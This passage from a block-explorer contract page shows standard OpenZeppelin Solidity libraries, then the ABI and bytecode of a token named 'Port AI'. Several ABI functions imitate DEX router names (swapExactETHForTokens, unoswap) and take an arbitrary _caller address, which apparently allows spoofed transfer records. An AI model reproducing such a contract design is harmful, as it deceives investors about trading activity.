            // 512 by 256 division.
            ///////////////////////////////////////////////

            // Make division exact by subtracting the remainder from [prod1 prod0].
            uint256 remainder;
            assembly {
                // Compute remainder using mulmod.
                remainder := mulmod(x, y, denominator)

                // Subtract 256 bit number from 512 bit number.
                prod1 := sub(prod1, gt(remainder, prod0))
                prod0 := sub(prod0, remainder)
            }

            // Factor powers of two out of denominator and compute largest power of two divisor of denominator.
            // Always >= 1. See https://cs.stackexchange.com/q/138556/92363.

            uint256 twos = denominator & (0 - denominator);
            assembly {
                // Divide denominator by twos.
                denominator := div(denominator, twos)

                // Divide [prod1 prod0] by twos.
                prod0 := div(prod0, twos)

                // Flip twos such that it is 2^256 / twos. If twos is zero, then it becomes one.
                twos := add(div(sub(0, twos), twos), 1)
            }

            // Shift in bits from prod1 into prod0.
            prod0 |= prod1 * twos;

            // Invert denominator mod 2^256. Now that denominator is an odd number, it has an inverse modulo 2^256 such
            // that denominator * inv = 1 mod 2^256. Compute the inverse by starting with a seed that is correct for
            // four bits. That is, denominator * inv = 1 mod 2^4.
            uint256 inverse = (3 * denominator) ^ 2;

            // Use the Newton-Raphson iteration to improve the precision. Thanks to Hensel's lifting lemma, this also
            // works in modular arithmetic, doubling the correct bits in each step.
            inverse *= 2 - denominator * inverse; // inverse mod 2^8
            inverse *= 2 - denominator * inverse; // inverse mod 2^16
            inverse *= 2 - denominator * inverse; // inverse mod 2^32
            inverse *= 2 - denominator * inverse; // inverse mod 2^64
            inverse *= 2 - denominator * inverse; // inverse mod 2^128
            inverse *= 2 - denominator * inverse; // inverse mod 2^256

            // Because the division is now exact we can divide by multiplying with the modular inverse of denominator.
            // This will give us the correct result modulo 2^256. Since the preconditions guarantee that the outcome is
            // less than 2^256, this is the final result. We don't need to compute the high bits of the result and prod1
            // is no longer required.
            result = prod0 * inverse;
            return result;
        }
    }

    /**
     * @notice Calculates x * y / denominator with full precision, following the selected rounding direction.
     */
    function mulDiv(uint256 x, uint256 y, uint256 denominator, Rounding rounding) internal pure returns (uint256) {
        uint256 result = mulDiv(x, y, denominator);
        if (unsignedRoundsUp(rounding) && mulmod(x, y, denominator) > 0) {
            result += 1;
        }
        return result;
    }

    /**
     * @dev Returns the square root of a number. If the number is not a perfect square, the value is rounded
     * towards zero.
     *
     * Inspired by Henry S. Warren, Jr.'s "Hacker's Delight" (Chapter 11).
     */
    function sqrt(uint256 a) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }

        // For our first guess, we get the biggest power of 2 which is smaller than the square root of the target.
        //
        // We know that the "msb" (most significant bit) of our target number `a` is a power of 2 such that we have
        // `msb(a) <= a < 2*msb(a)`. This value can be written `msb(a)=2**k` with `k=log2(a)`.
        //
        // This can be rewritten `2**log2(a) <= a < 2**(log2(a) + 1)`
        // → `sqrt(2**k) <= sqrt(a) < sqrt(2**(k+1))`
        // → `2**(k/2) <= sqrt(a) < 2**((k+1)/2) <= 2**(k/2 + 1)`
        //
        // Consequently, `2**(log2(a) / 2)` is a good first approximation of `sqrt(a)` with at least 1 correct bit.
        uint256 result = 1 << (log2(a) >> 1);

        // At this point `result` is an estimation with one bit of precision. We know the true value is a uint128,
        // since it is the square root of a uint256. Newton's method converges quadratically (precision doubles at
        // every iteration). We thus need at most 7 iteration to turn our partial result with one bit of precision
        // into the expected uint128 result.
        unchecked {
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            return min(result, a / result);
        }
    }

    /**
     * @notice Calculates sqrt(a), following the selected rounding direction.
     */
    function sqrt(uint256 a, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = sqrt(a);
            return result + (unsignedRoundsUp(rounding) && result * result < a ? 1 : 0);
        }
    }

    /**
     * @dev Return the log in base 2 of a positive value rounded towards zero.
     * Returns 0 if given 0.
     */
    function log2(uint256 value) internal pure returns (uint256) {
        uint256 result = 0;
        unchecked {
            if (value >> 128 > 0) {
                value >>= 128;
                result += 128;
            }
            if (value >> 64 > 0) {
                value >>= 64;
                result += 64;
            }
            if (value >> 32 > 0) {
                value >>= 32;
                result += 32;
            }
            if (value >> 16 > 0) {
                value >>= 16;
                result += 16;
            }
            if (value >> 8 > 0) {
                value >>= 8;
                result += 8;
            }
            if (value >> 4 > 0) {
                value >>= 4;
                result += 4;
            }
            if (value >> 2 > 0) {
                value >>= 2;
                result += 2;
            }
            if (value >> 1 > 0) {
                result += 1;
            }
        }
        return result;
    }

    /**
     * @dev Return the log in base 2, following the selected rounding direction, of a positive value.
     * Returns 0 if given 0.
     */
    function log2(uint256 value, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = log2(value);
            return result + (unsignedRoundsUp(rounding) && 1 << result < value ? 1 : 0);
        }
    }

    /**
     * @dev Return the log in base 10 of a positive value rounded towards zero.
     * Returns 0 if given 0.
     */
    function log10(uint256 value) internal pure returns (uint256) {
        uint256 result = 0;
        unchecked {
            if (value >= 10 ** 64) {
                value /= 10 ** 64;
                result += 64;
            }
            if (value >= 10 ** 32) {
                value /= 10 ** 32;
                result += 32;
            }
            if (value >= 10 ** 16) {
                value /= 10 ** 16;
                result += 16;
            }
            if (value >= 10 ** 8) {
                value /= 10 ** 8;
                result += 8;
            }
            if (value >= 10 ** 4) {
                value /= 10 ** 4;
                result += 4;
            }
            if (value >= 10 ** 2) {
                value /= 10 ** 2;
                result += 2;
            }
            if (value >= 10 ** 1) {
                result += 1;
            }
        }
        return result;
    }

    /**
     * @dev Return the log in base 10, following the selected rounding direction, of a positive value.
     * Returns 0 if given 0.
     */
    function log10(uint256 value, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = log10(value);
            return result + (unsignedRoundsUp(rounding) && 10 ** result < value ? 1 : 0);
        }
    }

    /**
     * @dev Return the log in base 256 of a positive value rounded towards zero.
     * Returns 0 if given 0.
     *
     * Adding one to the result gives the number of pairs of hex symbols needed to represent `value` as a hex string.
     */
    function log256(uint256 value) internal pure returns (uint256) {
        uint256 result = 0;
        unchecked {
            if (value >> 128 > 0) {
                value >>= 128;
                result += 16;
            }
            if (value >> 64 > 0) {
                value >>= 64;
                result += 8;
            }
            if (value >> 32 > 0) {
                value >>= 32;
                result += 4;
            }
            if (value >> 16 > 0) {
                value >>= 16;
                result += 2;
            }
            if (value >> 8 > 0) {
                result += 1;
            }
        }
        return result;
    }

    /**
     * @dev Return the log in base 256, following the selected rounding direction, of a positive value.
     * Returns 0 if given 0.
     */
    function log256(uint256 value, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = log256(value);
            return result + (unsignedRoundsUp(rounding) && 1 << (result << 3) < value ? 1 : 0);
        }
    }

    /**
     * @dev Returns whether a provided rounding mode is considered rounding up for unsigned integers.
     */
    function unsignedRoundsUp(Rounding rounding) internal pure returns (bool) {
        return uint8(rounding) % 2 == 1;
    }
}

File 10 of 13: Multicall.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/Multicall.sol)

pragma solidity ^0.8.20;

import {Address} from "./Address.sol";

/**
 * @dev Provides a function to batch together multiple calls in a single external call.
 */
abstract contract Multicall {
    /**
     * @dev Receives and executes a batch of function calls on this contract.
     * @custom:oz-upgrades-unsafe-allow-reachable delegatecall
     */
    function multicall(bytes[] calldata data) external virtual returns (bytes[] memory results) {
        results = new bytes[](data.length);
        for (uint256 i = 0; i < data.length; i++) {
            results[i] = Address.functionDelegateCall(address(this), data[i]);
        }
        return results;
    }
}

File 11 of 13: Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol)

pragma solidity ^0.8.20;

import {Context} from "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev The caller account is not authorized to perform an operation.
     */
    error OwnableUnauthorizedAccount(address account);

    /**
     * @dev The owner is not a valid owner account. (eg. `address(0)`)
     */
    error OwnableInvalidOwner(address owner);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the address provided by the deployer as the initial owner.
     */
    constructor(address initialOwner) {
        if (initialOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(initialOwner);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        if (owner() != _msgSender()) {
            revert OwnableUnauthorizedAccount(_msgSender());
        }
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        if (newOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 13 of 13: SignedMath.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/math/SignedMath.sol)

pragma solidity ^0.8.20;

/**
 * @dev Standard signed math utilities missing in the Solidity language.
 */
library SignedMath {
    /**
     * @dev Returns the largest of two signed numbers.
     */
    function max(int256 a, int256 b) internal pure returns (int256) {
        return a > b ? a : b;
    }

    /**
     * @dev Returns the smallest of two signed numbers.
     */
    function min(int256 a, int256 b) internal pure returns (int256) {
        return a < b ? a : b;
    }

    /**
     * @dev Returns the average of two signed numbers without overflow.
     * The result is rounded towards zero.
     */
    function average(int256 a, int256 b) internal pure returns (int256) {
        // Formula from the book "Hacker's Delight"
        int256 x = (a & b) + ((a ^ b) >> 1);
        return x + (int256(uint256(x) >> 255) & (a ^ b));
    }

    /**
     * @dev Returns the absolute unsigned value of a signed value.
     */
    function abs(int256 n) internal pure returns (uint256) {
        unchecked {
            // must be unchecked in order to support `n = type(int256).min`
            return uint256(n >= 0 ? n : -n);
        }
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"LIQUID_RATE","outputs":[{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_PERCENTAGE","outputs":[{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"airdropTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses","type":"address[]"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"bulkTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"buyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"buyTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"claimTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"excludedFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialized","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"multiSends","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_minimumAirdropAmount","type":"uint256"}],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"bool","name":"permission","type":"bool"}],"name":"setAirdrop","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"swapExactETHForTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradeOpen","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"unoswap","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60e060405262000014620004c260201b60201c565b600a62000022919062000a07565b620f424062000032919062000a57565b6080908152505f600760146101000a81548160ff0219169083151502179055505f600760156101000a81548160ff0219169083151502179055505f60085f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061dead60095f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505f60a0908152505f60c0908152505f600a553480156200010c575f80fd5b506040518060400160405280600781526020017f506f7274204149000000000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f504f525441490000000000000000000000000000000000000000000000000000815250620001996200018d620004ca60201b60201c565b620004d160201b60201c565b8160049081620001aa919062000cfc565b508060059081620001bc919062000cfc565b505050620001d133336200059260201b60201c565b6200020b3361271061ffff1661271061ffff16608051620001f3919062000a57565b620001ff919062000e0d565b6200061660201b60201c565b6001600760146101000a81548160ff0219169083151502179055506001600b5f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550737a250d5630b4cf539739df2c5dacb4c659f2488d600c5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505f600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200033b573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000361919062000ea9565b90508073ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620003eb573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000411919062000ea9565b6040518363ffffffff1660e01b81526004016200043092919062000eea565b6020604051808303815f875af11580156200044d573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000473919062000ea9565b60085f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550608051600a819055505062000ff9565b5f6012905090565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000687576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200067e9062000f73565b60405180910390fd5b6200069a5f83836200086b60201b60201c565b8060035f828254620006ad919062000f93565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825462000702919062000f93565b9250508190555060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620007ec5760065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620007de919062000fde565b60405180910390a362000854565b8173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200084b919062000fde565b60405180910390a35b620008675f83836200087060201b60201c565b5050565b505050565b505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b6001851115620008ff57808604811115620008d757620008d662000875565b5b6001851615620008e75780820291505b8081029050620008f785620008a2565b9450620008b7565b94509492505050565b5f82620009195760019050620009eb565b8162000928575f9050620009eb565b81600181146200094157600281146200094c5762000982565b6001915050620009eb565b60ff84111562000961576200096062000875565b5b8360020a9150848211156200097b576200097a62000875565b5b50620009eb565b5060208310610133831016604e8410600b8410161715620009bc5782820a905083811115620009b657620009b562000875565b5b620009eb565b620009cb8484846001620008ae565b92509050818404811115620009e557620009e462000875565b5b81810290505b9392505050565b5f819050919050565b5f60ff82169050919050565b5f62000a1382620009f2565b915062000a2083620009fb565b925062000a4f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000908565b905092915050565b5f62000a6382620009f2565b915062000a7083620009f2565b925082820262000a8081620009f2565b9150828204841483151762000a9a5762000a9962000875565b5b5092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168062000b1d57607f821691505b60208210810362000b335762000b3262000ad8565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f6008830262000b977fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000b5a565b62000ba3868362000b5a565b95508019841693508086168417925050509392505050565b5f819050919050565b5f62000be462000bde62000bd884620009f2565b62000bbb565b620009f2565b9050919050565b5f819050919050565b62000bff8362000bc4565b62000c1762000c0e8262000beb565b84845462000b66565b825550505050565b5f90565b62000c2d62000c1f565b62000c3a81848462000bf4565b505050565b5b8181101562000c615762000c555f8262000c23565b60018101905062000c40565b5050565b601f82111562000cb05762000c7a8162000b39565b62000c858462000b4b565b8101602085101562000c95578190505b62000cad62000ca48562000b4b565b83018262000c3f565b50505b505050565b5f82821c905092915050565b5f62000cd25f198460080262000cb5565b1980831691505092915050565b5f62000cec838362000cc1565b9150826002028217905092915050565b62000d078262000aa1565b67ffffffffffffffff81111562000d235762000d2262000aab565b5b62000d2f825462000b05565b62000d3c82828562000c65565b5f60209050601f83116001811462000d72575f841562000d5d578287015190505b62000d69858262000cdf565b86555062000dd8565b601f19841662000d828662000b39565b5f5b8281101562000dab5784890151825560018201915060208501945060208101905062000d84565b8683101562000dcb578489015162000dc7601f89168262000cc1565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f62000e1982620009f2565b915062000e2683620009f2565b92508262000e395762000e3862000de0565b5b828204905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f62000e738262000e48565b9050919050565b62000e858162000e67565b811462000e90575f80fd5b50565b5f8151905062000ea38162000e7a565b92915050565b5f6020828403121562000ec15762000ec062000e44565b5b5f62000ed08482850162000e93565b91505092915050565b62000ee48162000e67565b82525050565b5f60408201905062000eff5f83018562000ed9565b62000f0e602083018462000ed9565b9392505050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f62000f5b601f8362000f15565b915062000f688262000f25565b602082019050919050565b5f6020820190508181035f83015262000f8c8162000f4d565b9050919050565b5f62000f9f82620009f2565b915062000fac83620009f2565b925082820190508082111562000fc75762000fc662000875565b5b92915050565b62000fd881620009f2565b82525050565b5f60208201905062000ff35f83018462000fcd565b92915050565b60805160a05160c051613362620010325f395f818161089d0152611fdd01525f8181610acb0152611eff01525f61163601526133625ff3fe608060405234801561000f575f80fd5b506004361061021a575f3560e01c80637210829711610123578063a9059cbb116100ab578063d632135b1161007a578063d632135b14610606578063dd62ed3e14610622578063f01a4b9914610652578063f2fde38b1461066e578063f887ea401461068a5761021a565b8063a9059cbb14610592578063b22c95e7146105c2578063c9567bf9146105de578063d5abeb01146105e85761021a565b806395d89b41116100f257806395d89b41146104ec57806396784f751461050a578063985bdfd114610526578063a457c2d714610544578063a8aa1b31146105745761021a565b806372108297146104665780637d654c7f14610482578063825e7b831461049e5780638da5cb5b146104ce5761021a565b806339509351116101a65780634ca64b3a116101755780634ca64b3a146103d85780634e148e19146103f45780635d8228131461041057806370a082311461042c578063715018a61461045c5761021a565b806339509351146103505780634022b75e14610380578063470624021461039c5780634c255c97146103ba5761021a565b806323b872dd116101ed57806323b872dd146102a857806325fa0b98146102d857806327c8f835146102f65780632b14ca5614610314578063313ce567146103325761021a565b806306fdde031461021e578063095ea7b31461023c578063158ef93e1461026c57806318160ddd1461028a575b5f80fd5b6102266106a8565b604051610233919061261e565b60405180910390f35b610256600480360381019061025191906126d3565b610738565b604051610263919061272b565b60405180910390f35b610274610755565b604051610281919061272b565b60405180910390f35b610292610768565b60405161029f9190612753565b60405180910390f35b6102c260048036038101906102bd919061276c565b610771565b6040516102cf919061272b565b60405180910390f35b6102e0610863565b6040516102ed919061272b565b60405180910390f35b6102fe610876565b60405161030b91906127cb565b60405180910390f35b61031c61089b565b6040516103299190612753565b60405180910390f35b61033a6108bf565b60405161034791906127ff565b60405180910390f35b61036a600480360381019061036591906126d3565b6108c7565b604051610377919061272b565b60405180910390f35b61039a600480360381019061039591906128ce565b61096e565b005b6103a4610ac9565b6040516103b19190612753565b60405180910390f35b6103c2610aed565b6040516103cf919061297b565b60405180910390f35b6103f260048036038101906103ed9190612994565b610af3565b005b61040e60048036038101906104099190612a1b565b610b51565b005b61042a600480360381019061042591906128ce565b610c3d565b005b61044660048036038101906104419190612a59565b610d98565b6040516104539190612753565b60405180910390f35b610464610dde565b005b610480600480360381019061047b91906128ce565b610e7d565b005b61049c60048036038101906104979190612a84565b610fd8565b005b6104b860048036038101906104b39190612a59565b611076565b6040516104c5919061272b565b60405180910390f35b6104d6611093565b6040516104e391906127cb565b60405180910390f35b6104f46110ba565b604051610501919061261e565b60405180910390f35b610524600480360381019061051f91906128ce565b61114a565b005b61052e6112a5565b60405161053b919061297b565b60405180910390f35b61055e600480360381019061055991906126d3565b6112ab565b60405161056b919061272b565b60405180910390f35b61057c611391565b60405161058991906127cb565b60405180910390f35b6105ac60048036038101906105a791906126d3565b6113b6565b6040516105b9919061272b565b60405180910390f35b6105dc60048036038101906105d791906128ce565b6113d3565b005b6105e661152e565b005b6105f0611634565b6040516105fd9190612753565b60405180910390f35b610620600480360381019061061b91906128ce565b611658565b005b61063c60048036038101906106379190612aaf565b6117b3565b6040516106499190612753565b60405180910390f35b61066c600480360381019061066791906128ce565b611835565b005b61068860048036038101906106839190612a59565b611990565b005b610692611a9e565b60405161069f9190612b48565b60405180910390f35b6060600480546106b790612b8e565b80601f01602080910402602001604051908101604052809291908181526020018280546106e390612b8e565b801561072e5780601f106107055761010080835404028352916020019161072e565b820191905f5260205f20905b81548152906001019060200180831161071157829003601f168201915b5050505050905090565b5f61074b610744611ac3565b8484611aca565b6001905092915050565b600760149054906101000a900460ff1681565b5f600354905090565b5f61077d848484611c8d565b5f60025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6107c4611ac3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610843576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161083a90612c2e565b60405180910390fd5b6108578561084f611ac3565b858403611aca565b60019150509392505050565b600760159054906101000a900460ff1681565b60095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b7f000000000000000000000000000000000000000000000000000000000000000081565b5f6012905090565b5f6109646108d3611ac3565b848460025f6108e0611ac3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461095f9190612c79565b611aca565b6001905092915050565b610976611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000